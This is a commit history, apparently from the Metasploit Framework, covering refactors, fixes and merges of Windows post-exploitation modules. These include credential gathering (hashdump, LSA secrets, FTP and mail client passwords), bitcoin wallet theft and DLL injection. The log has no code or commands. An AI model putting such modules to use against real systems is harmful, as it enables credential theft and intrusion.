25f74b79b8
Land #3484 , bad pack/unpack specifier fix
2014-07-16 14:52:23 -05:00
52a29856b3
Merge branch 'master' into staging/electro-release
...
Conflicts:
Gemfile
Gemfile.lock
2014-07-16 09:38:44 -05:00
8937fbb2f5
Fix email format
2014-07-11 12:45:23 -05:00
62a2f1dc0a
Credential -> Model for realm key constants
2014-07-10 14:30:25 -05:00
2cd9577278
Fix table printing.
2014-07-09 21:46:34 -05:00
37f159d80a
corrections based on feedback
2014-07-09 09:54:04 -05:00
10713dd440
New module to build wordlist for use by JtR, oclhashcat, etc generated by pulling info from multiple Active Directory fields
2014-07-08 16:09:48 -05:00
aeda74f394
Merge branch 'master' into staging/electro-release
...
Conflicts:
Gemfile
Gemfile.lock
2014-07-07 16:41:23 -05:00
9fef2ca0f3
Description/whitespace changes (minor)
...
Four modules updated for the weekly release with minor cosmetic fixes.
- [ ] See all affected modules still load.
- [ ] See all affected modules have expected `info`
2014-07-07 12:39:05 -05:00
b6b5435a3d
Fix service pack parsing
2014-07-06 09:24:36 -05:00
43d65cc93a
Merge branch 'master' into feature/recog
...
Resolves conflicts:
Gemfile
data/js/detect/os.js
modules/exploits/android/browser/webview_addjavascriptinterface.rb
2014-07-06 09:17:44 -05:00
ef0826c319
Fix bugs
2014-07-04 20:46:50 +01:00
05c9757624
Merge in #3488
2014-07-04 20:37:09 +01:00
f1b7a9f421
Land #3488 - loot storage into the enum_services post module
2014-07-03 14:18:16 -05:00
2c999d3099
Better describe the problem
2014-07-03 13:06:19 -05:00
9aa3c75234
Do something for the shut-everything-up event handling practice
2014-07-03 13:04:56 -05:00
8a513058f6
Fix comments
2014-07-03 12:59:10 -05:00
ebeb9880a6
Favor "unless" over "if" for negative conditions
...
Please refer to https://github.com/bbatsov/ruby-style-guide
2014-07-03 12:55:13 -05:00
1d828a951f
string interpolation is preferred over concatenation
...
Please refer to https://github.com/bbatsov/ruby-style-guide
2014-07-03 12:46:56 -05:00
b781b87d74
Avoid unnecessary "if not"
2014-07-03 12:44:17 -05:00
9981a60b27
Add loot storage into the enum_service post module
2014-07-02 17:56:16 +01:00
83abf4b523
Add loot storage into the enum_service post module
2014-07-02 17:48:48 +01:00
f0cb235393
Merge branch 'feature/MSP-9735/gpp' into staging/electro-release
2014-07-01 14:28:15 -05:00
d341fc20a8
switch to use file? instead of stat
2014-07-01 00:58:17 -04:00
c9b6c05eab
Fix improper use of host-endian or signed pack/unpack
...
Note that there are some cases of host-endian left, these
are intentional because they operate on host-local memory
or services.
When in doubt, please use:
```
ri pack
```
2014-06-30 02:50:10 -05:00
920bd1132e
replace manual packing with rex version
2014-06-25 00:16:28 -04:00
86869f0a81
remove extra parenthesis
2014-06-23 17:10:31 -04:00
8e37aea7c2
remove use of Q in packing and unpacking
2014-06-23 16:52:53 -04:00
a7d00f8144
simplify SHA1 code
2014-06-23 15:39:06 -04:00
77620193a1
remove character restriction on aes.final call
2014-06-23 15:37:19 -04:00
2d0b4b96ee
remove verbose exit if no salt found
2014-06-23 15:34:07 -04:00
275d8826bd
skype post module to extract password hash
2014-06-23 15:16:50 -04:00
dbd0bc5fa2
Refactor windows_autologin creds
2014-06-19 14:38:31 -05:00
d246e28cb3
Merge branch 'feature/MSP-9733/ftpnavigator' into staging/electro-release
2014-06-13 16:03:06 -05:00
da74777570
Merge branch 'feature/MSP-9729/enum_cred_store' into staging/electro-release
2014-06-13 15:46:08 -05:00
8be602e487
Merge branch 'feature/MSP-9734/ftpx' into staging/electro-release
2014-06-13 15:36:43 -05:00
1df7362774
Merge branch 'feature/MSP-9740/outlook' into staging/electro-release
2014-06-13 15:34:06 -05:00
81d47c4eb3
Merge branch 'feature/MSP-9730/epo_sql' into staging/electro-release
2014-06-13 15:31:41 -05:00
3ad3ca88e5
Use session.session_host
2014-06-12 18:26:01 -05:00
a7416332e3
Merge branch 'feature/MSP-9732/flashfxp' into staging/electro-release
2014-06-12 18:02:20 -05:00
1969c8f018
Merge branch 'feature/MSP-9727/bulletproof_ftp' into staging/electro-release
2014-06-12 15:41:57 -05:00
ff2fc68d11
Fix busted vars
2014-06-12 15:37:06 -05:00
18a2e0928c
Merge branch 'feature/MSP-9737/wsftp_client' into staging/electro-release
2014-06-12 15:08:26 -05:00
96e492f572
Merge branch 'master' into staging/electro-release
2014-06-12 14:02:27 -05:00
d9d16e436a
Refactor epo_sql creds
2014-06-12 13:23:11 -05:00
302e495451
Fix bad indent
2014-06-12 13:13:05 -05:00
c7bb0f1eb8
Fix bad copypasta
2014-06-12 12:59:35 -05:00
0d92ae08dd
Refactor enum_cred_store creds
2014-06-12 12:57:46 -05:00
429d85dc5d
Refactor flashfxp creds
2014-06-12 12:40:33 -05:00
e96a70a0f5
Refactor outlook creds
2014-06-12 12:31:12 -05:00
d5b32e31f8
Fix a typo where platform was 'windows' not 'win'
...
This was reported by dracu on freenode
2014-06-11 15:10:33 -05:00
ac94f8e861
Refactor bulletproof_ftp creds
2014-06-11 13:04:58 -05:00
7147a88968
Refactor ftpnavigator creds
2014-06-11 12:57:45 -05:00
676afe391a
Refactor gpp creds
2014-06-11 12:48:00 -05:00
41ff4c3dce
Refactor ftpx creds
2014-06-11 12:35:15 -05:00
4d923a4809
Update to Rubyzip 1.X API
...
MSP-10004
`require 'zip'` instead of `'zip/zip'` and rename all classes to remove
redundant Zip prefix inside the Zip namespace.
2014-06-10 13:41:42 -05:00
9826a57429
Update coreftp.rb
2014-06-10 13:01:19 -05:00
dffc9b6852
Use the new hash syntax for consistency
2014-06-10 12:56:15 -05:00
d7fd7b8d1e
Refactor wsftp_client creds
2014-06-10 12:05:04 -05:00
f660f557e5
Merge pull request #38 from rapid7/feature/msp-9738/winscp
...
Feature/msp 9738/winscp
2014-06-06 11:43:50 -05:00
ef8f237050
refactor filezilla_server
...
you know the score
2014-06-04 15:43:15 -05:00
28bf29980e
Merge branch 'master' into staging/electro-release
2014-06-04 10:21:08 -05:00
f2e1732878
Resolve hostnames before trying to save
2014-06-03 15:19:30 -05:00
0272593923
Merge pull request #32 from rapid7/feature/MSP-9736/vnc-post
...
refactor vnc post module
MSP-9736 #land
2014-06-03 13:53:42 -05:00
8abed15c77
Switch to Credential::* things
2014-06-03 11:48:08 -05:00
883976c6a8
Merge pull request #33 from rapid7/feature/MSP-9741/smartftp
...
refactor smartftp post module
MSP-9741 #land
2014-06-03 10:04:09 -05:00
9d9f3b5a03
Refactor to prepare for replacing report_auth_info
2014-06-02 18:07:44 -05:00
ea383b4139
Make print/descs/case consistent
2014-06-02 13:20:01 -05:00
5c745c4b9c
Merge pull request #31 from rapid7/feature/MSP-9728/coreftp
...
refactor coreFTP post module
MSP-9728 #land
2014-06-02 13:19:11 -05:00
9eb42cb80f
refactor smartftp post module
...
refactor the smartftp credential post module to use
Metasploit::Credential
2014-06-02 11:48:45 -05:00
34004908bb
Merge branch 'master' into staging/electro-release
...
Conflicts:
.ruby-version
2014-06-02 11:10:33 -05:00
d9fd77fba7
Merge pull request #29 from rapid7/feature/MSP-9739/mremote_refactor
...
Feature/msp 9739/mremote refactor
MSP-9739 #land
2014-06-02 11:05:20 -05:00
1e2ae16713
refactor vnc post module
...
this adds Metasploit::Credential functionality to
the post/windows/gather/credentials/vnc module
it also fixes a hostname resolution issue on windows
hashdump that could occur when the peerhost is an unresolved
hostname
2014-05-30 14:27:44 -05:00
86fec3a33f
refactor coreFTP post module
...
post/windows/gather/credentials/coreftp now uses
the new Metasploit::Credential methods
2014-05-30 14:06:31 -05:00
0d07fb6c39
Land #2858 , @jiuweigui's post module to enumerate Enumerate MUICache
2014-05-29 17:08:50 -05:00
a6229aedff
Rescue RequestError when downloading file
2014-05-29 17:07:22 -05:00
f2a71a47ca
Use \&\& instead of and
2014-05-29 17:04:38 -05:00
31c282153e
Avoid ntuser.dat md5 because is causing problems, even when data is extracted
2014-05-29 17:02:28 -05:00
e012d55d73
refactor mremote
...
mremote post module now refactored to
use new metasploit credentials
2014-05-29 16:27:41 -05:00
95b71dee00
Try to fix crash while file_remote_digest
2014-05-29 16:12:51 -05:00
a1131092b7
fix open rescue
...
rescuing all exceptions bad
bad past dave bad
2014-05-29 16:05:16 -05:00
cbbd7bfdf4
Refacotor code
2014-05-29 15:55:44 -05:00
bf3bb63e4a
fix mremote to work on mremoteNG
...
fixed the mremote credential post module to work
against the newer mRemoteNG
2014-05-29 15:43:02 -05:00
f61aeb818a
smart hashdump refactor
...
refactor the windows smart hashdump post module
to use the new cred creation methods
2014-05-29 15:06:42 -05:00
cdabb71d23
Make code cleanup
2014-05-29 14:51:10 -05:00
e3c4745879
Windows Hashdump post module refactor
...
refactor the Hashdump post module for window
to use the new cred creation methods.
Also some extra methods to do db safe checks
for record ids that we need
2014-05-29 13:20:32 -05:00
e585d11499
make MSF_MODULES a constant
2014-05-25 19:36:40 -05:00
61603748bd
two more tweaks
2014-05-25 10:45:09 -04:00
6435b4370a
@Meatballs1 fixes
2014-05-25 10:40:23 -04:00
e3a6782345
add post module based on @zeroSteiner idea
2014-05-24 23:37:17 -04:00
aeaff16f88
More legible output
2014-05-20 22:27:24 +01:00
92669cd4d6
Use parser
2014-05-20 22:26:13 +01:00
fabaf52929
Tidyup of GPP
...
Add Security Bulletin Reference
ProgramData is symlink to AllUsers anyway
Use NetAPI
2014-05-20 21:53:53 +01:00
a844b5c30a
Merge branch 'master' of github.com:hmoore-r7/metasploit-framework into feature/recog
...
Conflicts:
Gemfile
Gemfile.lock
data/js/detect/os.js
lib/msf/core/exploit/remote/browser_exploit_server.rb
2014-05-18 10:50:32 -05:00
c474ff4465
Merge remote-tracking branch 'upstream/master' into extapi_service_post
...
Conflicts:
modules/exploits/windows/local/service_permissions.rb
modules/post/windows/manage/rpcapd_start.rb
2014-05-05 13:19:25 +01:00
e514ff3607
Description and print_status fixes for release
...
@cdoughty-r7, I choose you! Or @wvu-r7.
2014-04-21 14:00:03 -05:00
ee413ac385
Remove previously deprecated modules
2014-04-20 22:15:44 -05:00
5bd9721d95
Redundant include
2014-04-15 21:34:21 +01:00
02b11afddc
Merge remote-tracking branch 'upstream/master' into netapi_change_passwd
...
Conflicts:
lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb
2014-04-15 21:23:45 +01:00
bd9b5add49
Dont report creds
...
We dont know if a DOMAIN or IP is specified etc.
2014-04-15 21:14:49 +01:00
fc018eb32e
Initial commit
2014-04-15 21:05:06 +01:00
062175128b
Update @Meatballs and @FireFart in authors.rb
2014-04-09 10:46:10 -05:00
ae3ead6ef9
Land #2107 Post Enum Domain Users
2014-04-09 11:32:12 +01:00
fbec434ab2
Fix up host.os* field usage in the enum_ad_computers module
2014-04-02 07:30:37 -07:00
460a1f551c
Fix for R7-2014-05
2014-03-24 14:12:12 -05:00
3ea3968d88
Merge branch 'upstream/master' into stop_abusing_expand_path
...
Conflicts:
lib/msf/core/post/windows/shadowcopy.rb
modules/exploits/windows/local/bypassuac.rb
modules/post/windows/gather/wmic_command.rb
modules/post/windows/manage/persistence.rb
2014-03-11 23:13:39 +10:00
32d83887d3
Merge remote-tracking branch 'upstream/master' into wmic_post
2014-03-03 21:56:31 +00:00
63751c1d1a
Small msftidies
2014-02-28 22:18:59 +00:00
42a730745e
Land #2418 , Use meterpreter hostname resolution
2014-02-28 14:45:39 -06:00
2b5e4bea2b
Landing Pull Request 3003
2014-02-28 10:10:12 -06:00
0dfa53840a
Add @Meatballs1 to authors
...
Add @Meatballs1 to author list, awesome changes and fixes to the code (almost complete rewrite)
2014-02-22 12:24:56 +02:00
4c557a1401
Add Post::Windows::Services#each_service
...
Also cleans up some style issues and adds yardoc comments for some stuff
in Post::File
Note that windows/local/service_permissions is still using
`service_list` because it now builds a Rex::Table, which has to have
all the data up front, anyway.
2014-02-18 18:24:23 -06:00
684c45a5ff
Merge remote-tracking branch 'upstream/pr/2766' into merge-2766
2014-02-18 17:36:13 -06:00
ff4e91bb1b
Check domain return value
2014-02-18 23:34:17 +00:00
e4aedfad43
Fixup netapi call
2014-02-18 23:30:29 +00:00
0480ad16aa
No common
2014-02-18 23:09:35 +00:00
c06f86cc2b
Updates
2014-02-18 20:31:31 +00:00
6f988209ab
Merge remote-tracking branch 'upstream/master' into enum_domain_users_update
2014-02-18 20:02:39 +00:00
4903b05214
Fix tabs
2014-02-18 13:51:40 -06:00
8a68323cf0
Dont keep checking domain
2014-02-18 17:52:34 +00:00
e290529841
Sadly this url is dead
2014-02-17 22:07:19 +00:00
6c32848b10
Use correct post methods
2014-02-17 22:03:07 +00:00
83d9a1e7c2
Xp Compat?
2014-02-17 21:28:06 +00:00
5e52e48d16
Gather cached GPO
2014-02-17 20:45:56 +00:00
c39924188a
Clean up
2014-02-14 20:52:04 +00:00
ad72ecaf84
Handle SPN array
2014-02-14 09:48:23 +00:00
4b828e5d45
Dont parse empty SPNs
2014-02-14 09:41:37 +00:00
2c12952112
Moar corrections
2014-02-14 09:37:00 +00:00
9dd56d32de
Corrections
2014-02-14 09:32:53 +00:00
7ef68184e1
Handle SPNs differently
2014-02-13 23:24:55 +00:00
95048b089e
Dont search for made up fields
2014-02-13 22:51:55 +00:00
61563fb2af
Do minor cleanup
2014-02-13 09:10:04 -06:00
67367092b7
Solve conflicts
2014-02-13 08:42:53 -06:00
ce2de8f3bf
Different way to write this
2014-02-12 15:08:20 -06:00
0f620f5aba
Fix Uninitialized Constant RequestError
...
[SeeRM #8765 ] NameError uninitialized constant
2014-02-12 00:23:23 -06:00
1236a4eb07
Fixup on description and some option descrips
2014-02-10 14:41:59 -06:00
63305025aa
Land #2615 - Add Windows Gather Active Directory User Comments
2014-02-07 12:23:43 -06:00
9c76e7fb00
Handle multiple exceptions
2014-02-07 12:23:10 -06:00
40188e1eda
RuntimeError exception should be handled.
2014-02-07 12:16:15 -06:00
89e1bcc0ca
Deprecate modules with date 2013-something
...
These modules had an expiration date of 2013.
2014-02-04 14:49:18 -06:00
e54abb4274
Add support for shell session type
2014-02-02 23:37:56 -06:00
ae84e354e8
Be consistent with get_smartermail_creds method's return value
2014-02-02 22:06:14 -06:00
662fbf53b6
Update check_smartermail method
...
Instead of using exception handling to determine the right path,
the new method simply uses the file? method. It's also renamed as
"get_mail_config_path" to properly describe its functionality.
2014-02-02 22:01:38 -06:00
2b2194cee8
Modify prints
2014-02-02 21:58:10 -06:00
62dca111f8
Conform to style
2014-02-02 08:07:18 +10:30
e30195348e
Add Windows Gather SmarterMail Password Extraction post module
2014-02-02 05:51:21 +10:30
09b70d1574
Remove max search
2014-01-24 00:27:46 +00:00
0a15e07473
Merge remote-tracking branch 'upstream/master' into service_principle_name
2014-01-24 00:26:52 +00:00
5880f7ebf2
Remove max search
2014-01-24 00:25:03 +00:00
f6054e6581
Merge remote-tracking branch 'upstream/master' into enum_ad_users
2014-01-24 00:24:31 +00:00
982795ee5d
Merge pull request #32 from todb-r7/saner-ifs-pr1473
...
Clean up the if.nils?
2014-01-23 15:50:25 -08:00
790e4d7559
Move options to mixin
2014-01-23 23:47:46 +00:00
e066d86d41
Clean up the if.nils?
2014-01-23 17:36:10 -06:00
c190a1b630
Fix field order
2014-01-22 09:29:18 +00:00
720f892e2f
Merge remote-tracking branch 'upstream/master' into enum_ad_perf
2014-01-21 21:00:51 +00:00
f571d63088
Merge remote-tracking branch 'upstream/master' into enum_ad_users
2014-01-21 21:00:09 +00:00
eee716a6b3
Grab comments and descriptions ftw
2014-01-21 20:59:31 +00:00
cd989e5dc0
Initial commit
2014-01-21 17:08:31 +00:00
6cd4c66d85
Merge remote-tracking branch 'oj/updated_meterpreter_binaries' into service_principle_name
2014-01-21 15:47:04 +00:00
5f5ca1c011
Minor fix based on suggestions
2014-01-14 20:56:14 +02:00
9a81420e90
Enumerate WinXP/7 MUICache registry key
2014-01-10 13:21:47 +02:00
266b040457
Update cachedump.rb
...
Change to OpenSSL::Digest from deprecated OpenSSL::Digest::Digest
2014-01-07 22:14:10 +01:00
e75d87327f
Merge branch 'enum_ad_perf' into enum_ad_users
2014-01-07 12:21:39 +00:00
3bf728da61
Dont store in DB by default
2014-01-07 12:20:44 +00:00
cd38f1ec5d
Minor touchups to recent modules.
2014-01-03 13:39:14 -06:00
d0031c2ffa
change_startup can now be run remotely
2014-01-03 16:25:15 +00:00
c426946886
Final tidyups
2014-01-03 15:55:03 +00:00
ab4c07c72a
Remove post/persist - it is past depreciation date
2014-01-03 15:45:40 +00:00
9028060f7d
Refactor service_create
2014-01-03 15:44:59 +00:00
5adc9e93f4
Merge remote-tracking branch 'upstream/master' into extapi_service_post
2014-01-03 14:39:55 +00:00
1cb671b02e
Merge branch 'adjust_getenv_api' into stop_abusing_expand_path
2014-01-03 08:14:02 +10:00
3f0ee081d9
Beautify description
2014-01-02 15:37:58 -06:00
d5e196707d
Include Msf::Post::Windows::Error
2014-01-02 13:41:37 -06:00
ec8d24c376
Update against upstream
2014-01-02 12:55:46 -06:00
3bccaa407f
Beautify use of Regexp
2014-01-02 12:54:54 -06:00
832b0455f1
Class constants and Regex added
2013-12-31 03:20:12 +01:00
4366d4da20
Delete comma
2013-12-30 11:45:52 -06:00
54a6a4aafa
Land #2807 , @todb-r7's armory support for bitcoin_jaker
2013-12-30 11:44:51 -06:00
e3d918a8a3
Applying changes
2013-12-30 01:49:13 +01:00
88cf1e4843
Default false KILL_PROCESSES for bitcoin_jacker
...
I seem to able to read associated wallet files while these processes are
running with the greatest of ease. Maybe there was a file locking
concern, but I haven't run into it. Feel free to avoid landing this
particular commit if you disagree.
2013-12-29 14:12:00 -06:00
5e0c7e4741
DRY up bitcoin_jacker.rb, support Armory
...
Also, make the process killing optional.
2013-12-29 13:07:43 -06:00
9384a466c1
Retab bitcoin_jacker.rb
2013-12-29 10:59:15 -06:00
6fcd12e36c
Refactor for clearer syntax and variables
...
This was done on a barely configured Windows machine, so mind the tabs.
2013-12-29 10:15:48 -06:00
ef73ca537f
First, clean up the original a little
2013-12-28 18:57:04 -06:00
f2335b5145
Land #2792 - SSO/Mimikatz module overwrites password with N/A
2013-12-27 17:25:44 -06:00
bf8c0b10fa
Dont store n/a creds
2013-12-21 09:04:02 +00:00
a043d384d4
Land #2738 , @jiuweigui update to enum_prefetch
2013-12-20 10:26:54 -06:00
71ba78c2f0
Direct to correct module
2013-12-20 16:09:57 +00:00
f99a5b8b47
Update for extapi
2013-12-20 13:18:01 +00:00
4ca25d5d89
Merge branch 'enum_ad_perf' into enum_ad_users
2013-12-20 12:54:24 +00:00
62ef810e7c
Use Extapi if available
2013-12-19 18:18:47 +00:00
737154c2fe
Update to use extapi
2013-12-19 16:46:09 +00:00
3ef1c0ecd6
Merge remote-tracking branch 'upstream/master' into enum_ad_perf
2013-12-19 14:25:07 +00:00
244cf3b3f6
Merge remote-tracking branch 'upstream/pr/2736' into enum_ad_perf
2013-12-19 13:59:57 +00:00
a77daa0902
Fix download_exec to better handle spaces
...
It was just wrong. Now it actually works.
2013-12-19 13:00:26 +10:00
9fb081cb2d
Add getenvs, update getenv, change extract_path use
...
Stacks of modules were using `extract_path` where it wasn't really semantically correct
because this was the only way to expand environment variables. This commit fixes that
up a bit.
Also, I changed the existing `getenv` function in `stdapi` to `getenvs`, and had it
support the splat operator. I added a `getenv` function which is used just for a
single variable and uses `getenvs` behind the scenes.
The meterpreter console `getenv` command now uses `getenvs`
2013-12-19 11:54:34 +10:00
3e54379b0e
Merge remote-tracking branch 'upstream/master' into wmic_post
...
Conflicts:
lib/msf/core/post/windows.rb
2013-12-18 13:40:54 +00:00
0e33fc40a2
Remove duplicate test services
2013-12-18 11:56:24 +00:00
0be6350360
rpcapd_start should use service_restart
2013-12-18 11:54:15 +00:00
42bc5ab75f
Use Services calls in enable_rdp
...
Update calls to change_service_config to check success
2013-12-18 11:34:12 +00:00
11ea66996c
Check for nil values
2013-12-18 11:15:52 +00:00
0327d2ba53
Fix deprecated date
2013-12-18 00:09:33 +00:00
0bac2415ca
Some post testing fixes
...
Also deprecate net escalate as it is covered by service_permissions
as a generic exploit
2013-12-18 00:00:14 +00:00
89ffafad0e
Changes to Service mixin
2013-12-17 13:10:27 +01:00
c2dd174e3c
Merge remote-tracking branch 'upstream/master' into extapi_service_post
2013-12-17 01:54:24 +00:00
560080fa21
Update start_service return value
...
Add service_restart
2013-12-17 00:43:35 +00:00
f39bc0b07a
Update service_stop return
2013-12-17 00:22:37 +00:00
040619c373
Minor description changes
...
No code changes (one comment made on play_youtube to suggest xdg-open
rather than firefox for linux targets).
2013-12-16 14:57:33 -06:00
446db78818
Minor fix to gather_pf_info function
2013-12-16 21:33:07 +02:00
87fe6ecfaa
Fixup modules
2013-12-15 18:43:55 +00:00
f10a35ed08
Use :display correctly
2013-12-15 18:28:29 +00:00
577adcef27
enum_services service_info fixup
2013-12-15 18:13:12 +00:00
6d5aefd620
rpcapd_start service_info fixup
2013-12-15 18:09:57 +00:00
bcde06bfc7
net_runtime service_info fixup
2013-12-15 18:06:32 +00:00
ddf23ae8e8
Refactor service_list to return array of hashes
...
Update trusted_service_path, service_permissions,
net_runtime_modify and enum_services to handle change.
Refactor enum_services to tidy it up a bit
2013-12-15 03:00:29 +00:00
b532987b8f
Re-add file out to wmic_command
2013-12-14 20:58:33 +00:00
7902f061ca
Final tidyup
2013-12-14 20:18:14 +00:00
04496a539c
Fix up local wmi exploit.
2013-12-14 20:05:51 +00:00
4224c016f4
Use WaitForSingleObject instead of loop
2013-12-14 18:42:31 +00:00
12afdd2cbb
Get and parse result from clipboard
2013-12-14 18:30:43 +00:00
3ad1e57f8d
Merge remote-tracking branch 'upstream/master' into wmic_post
2013-12-14 16:25:31 +00:00
f185c2deb1
added driver_loaded post meterpreter module
2013-12-14 00:07:04 +01:00
374e40c815
Add requires
2013-12-11 12:05:12 -06:00
572ddacdd6
Clean ie_proxypac
2013-12-11 11:49:29 -06:00
7589b4c4d5
Merge for retab
2013-12-11 11:47:30 -06:00
e6eeb4a26d
rescue RuntimeError added
2013-12-11 03:00:13 +01:00
1b3bc878f8
Unscrew the author name
2013-12-09 21:32:03 -06:00
e9edce10ac
Applying changes
2013-12-10 03:07:40 +01:00
e737b136cc
Minor grammar/caps fixup for release
2013-12-09 14:01:27 -06:00
2a0b503f06
Minor fix
2013-12-08 18:17:22 +02:00
5e5fd6b01a
Unless replaced
2013-12-06 15:01:35 +01:00
3aebe968bb
Land #2721 Reflective DLL Mixin
...
Adds support to load a dll and identify the ReflectiveLoader offset.
Adds support to inject dll into process and execute it.
Updates kitrap0d, ppr_flatten_rec, reflective_dll_inject modules and
payload modules to use above features.
2013-12-06 12:26:51 +00:00
73d3ea699f
Remove the last redundant error check
2013-12-06 09:32:21 +10:00
2cb991cace
Shuffle RDI stuff into more appropriate structure
...
Now broken into two modules, one for loading RDI DLLs off disk and
finding the loader function offset, and another for doing the process
specific stuff of loading into the target.
2013-12-06 08:25:24 +10:00
79e23a1e13
Land #2675 , @JonValt's forensics/browser_history
...
Great job!
2013-12-05 09:35:53 -06:00
cd5172384f
Rename gather_browser_history.rb to browser_history.rb
2013-12-05 08:43:19 -06:00
3957bbc710
capitalization ("skype")
...
(https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r8120307 )
Removed some Chrome artifacts and renamed one to reflect "Archived History."
(https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r8120314 )
((Will include other doxxes in another module.))
2013-12-05 08:33:47 -06:00
717f45ac09
Minor modification
2013-12-05 09:07:28 +02:00
902d48efab
Delete debug prints
2013-12-05 09:03:42 +02:00
492cd1ca07
Modifications how info is collected from pf files.
2013-12-05 08:56:26 +02:00
b936831125
Renamed the mixin module
2013-12-05 08:13:54 +10:00
1833b6fd95
More changes. No admin privs check
2013-12-04 14:51:46 +01:00
7e8db8662e
Update name of the mixin
...
Changed `RdiMixin` to `ReflectiveDLLInjection`.
2013-12-04 22:18:29 +10:00
05479b2a19
Added new options
2013-12-04 11:45:37 +01:00
f79af4c30e
Add RDI mixin module
...
MSF was starting to see more modules using RDI to load binaries into
remote processes, so it made sense to create a mixin which contained
the functionality that was being used in various locations.
This commit contains the new mixin, and adjustments to all the existing
exploits and modules which use RDI.
2013-12-04 16:09:41 +10:00
5c266adfd7
added ie_proxypac post meterpreter module
2013-12-03 22:23:09 +01:00
d1dd7c291b
cosmetic (indentation)
...
https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r7977962
2013-12-02 13:16:48 -06:00
cdf6ffa70d
Complete refactor with lots of help from @kernelsmith and @OJ. Thank you guys so much.
2013-11-27 21:02:48 -06:00
a8af050c16
Update post module Apache Tomcat description
...
This module's description needs to be more descriptive, otherwise
you kind of have to pull the source code to see what it actually
does for you.
2013-11-27 19:21:27 -06:00
1c17383eff
removed return file_loc
...
removed extra space
2013-11-27 15:04:31 -06:00
036cd8c5ad
couple cosmetic changes per wvu-r7
2013-11-27 14:44:39 -06:00
9dbeb55b9a
removed single quotes from inside %q{} on line 22 per https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r7913331
...
removed empty advanced options registration on line 28 per https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r7913342
2013-11-26 10:29:38 -06:00
48578c3bc0
Update description about suitable targets
...
The same technique work for Microsoft Office 2013 as well. Tested.
2013-11-24 23:02:37 -06:00
49441875f3
Land #2683 , @wchen-r7's module name consistency fix
2013-11-24 16:51:22 -06:00
23a267b65c
Undo move
2013-11-24 15:06:36 +00:00
23ac7ad75a
Merge remote-tracking branch 'upstream/master' into getaddrinfo
2013-11-24 15:00:00 +00:00
c03c33f6f6
Initial commit
2013-11-24 14:58:18 +00:00
ce8b63f240
Update module name to stay consistent
...
This module is under the windows/gather, so must be named the same
way like the rest.
2013-11-24 01:01:29 -06:00
72822cfa2d
Save egypt from eol comments
2013-11-23 22:11:46 +00:00
646f977888
Use post mixin
2013-11-23 22:07:07 +00:00
4d3e061e43
Merge branch 'enum_ad_perf' into enum_ad_users
2013-11-23 22:05:15 +00:00
699d13eef1
Share the wealth
...
Move LDAP methods to a Post mixin.
2013-11-23 21:42:09 +00:00
11f00cc50b
Backout small change
2013-11-23 21:23:25 +00:00
0c8fc657bb
Address @jlee-r7's comments
2013-11-23 19:42:33 +00:00
b712c77413
capitalization
2013-11-22 14:37:54 -06:00
52a3b93f24
Hopefully final commit.
...
ALL issues mentioned by todb in https://github.com/rapid7/metasploit-framework/pull/2663/ have been fixed or erased.
Only exception is comment https://github.com/rapid7/metasploit-framework/pull/2663/#discussion_r7837036 which if omitted as recommended, breaks the module.
2013-11-22 14:17:20 -06:00
9addd37458
minor changes:
...
s/grab/gather/g
2013-11-22 14:03:54 -06:00
b742ed13b9
junk commit
2013-11-22 12:38:06 -06:00
b2e7ff4587
Small change for filetime conversion
2013-11-17 22:26:30 +02:00
b73260b74c
Add functionality to enum_prefetch post module
2013-11-17 22:10:55 +02:00
5b96ad595f
Skip reg values with no secretes
...
Also update header comment to match new standard
2013-11-13 19:05:16 -06:00
cb10b4783b
Mark XP hashes as mscash for JtR to recognize
2013-11-13 19:04:16 -06:00
0aef145f64
Merge remote-tracking branch 'upstream/master' into land-2532-enum-lsa
2013-11-13 18:11:21 -06:00
8471f74b75
Refactor ivar to a more reasonable method
...
Also changes jtr output for cachedump to produce hashes that can be
auto-detected as mscash2 format for a better user experience.
2013-11-13 18:09:41 -06:00
8bb72764ec
Rename credentials/lsa -> lsa_secrets
...
Secrets are not necessarily credentials
2013-11-13 15:23:15 -06:00
16627c1bd3
Add spec for capture_lsa_key
2013-11-13 15:16:34 -06:00
3168359a82
Refactor lsa and add a spec for its crypto methods
2013-11-13 11:55:39 -06:00
d9fa092962
Initial commit
2013-11-07 20:48:15 +00:00
6415666830
Merge remote-tracking branch 'upstream/master' into enum_ad_perf
2013-11-07 17:00:56 +00:00
f62247e731
Fix comments, indenting and pxexploit module
...
Updated the comments and indentation so they're not blatantly wrong.
Adjusted the pxexploit module so that it doesn't break any more as
a result of the refactoring.
2013-11-05 06:35:50 +10:00
4128aa8c08
Resplat and tabs
2013-10-28 14:03:15 -05:00
a95425de08
Check dec instead
2013-10-25 10:47:41 -05:00
1d0a3aad70
[FixRM #8525 ] undefined method `+' for nil:NilClass in enum_ie
...
Looks like for some reason if CryptUnprotectData fails, the decrypt_reg()
method will return "". And when you unpack "", you produce an array of nils.
Since you cannot add something to nil, this should cause an
"undefined method `+' for nil:NilClass" error.
This will check if we get an array of nils, we jump to the next iteration.
2013-10-25 00:26:38 -05:00
e1c4aef805
Land #1789 - Windows SSO Post Module
2013-10-22 15:48:15 -05:00
e447aff0ec
Fix misleading statement in Outlook post module
...
Since this module doesn't retrieve domain exchange information as it isn't stored there it shouldn't say that Outlook isn't installed at all.
2013-10-22 11:53:15 -04:00
72f3d4f86c
Land #2496 - Added ability to generate multiple payloads
...
Thx Dave!
2013-10-22 01:42:03 -05:00
57e39c2b2c
Land #2498 - multiple payload capabilities
2013-10-21 14:51:24 -05:00
03adb48d48
Resolve NoMethodError undefined method `empty?' for nil:NilClass
...
blank? should fix this.
2013-10-21 14:50:25 -05:00
4c14595525
Land #2535 - Use %PATH% for notepad
2013-10-21 13:14:44 -05:00
9d6031acdb
Reverting payload_inject because of x64 shellcode
...
Injecting x64 shellcode in a SYSWOW64 process spawn a 32 bit notepad, so
we revert the changes.
2013-10-18 09:51:18 +02:00
563bf4e639
Fix bug #8502 , used %PATH% for notepad invocation
...
We use system %PATH% for notepad executable instead of the absolute
path, because it caused a problem with the migrate script in a 64-bit
meterpreter session. By default the wordpad binary is not in the
%PATH%, so the condition in hp_nnm_ovbuildpath_textfile.rb was not
changed.
2013-10-17 15:41:12 +02:00
8f2ba68934
move decrypt_lsa and decrypt_secret to priv too
2013-10-17 00:04:21 -04:00
541d932d77
move decrypt_lsa to priv as well
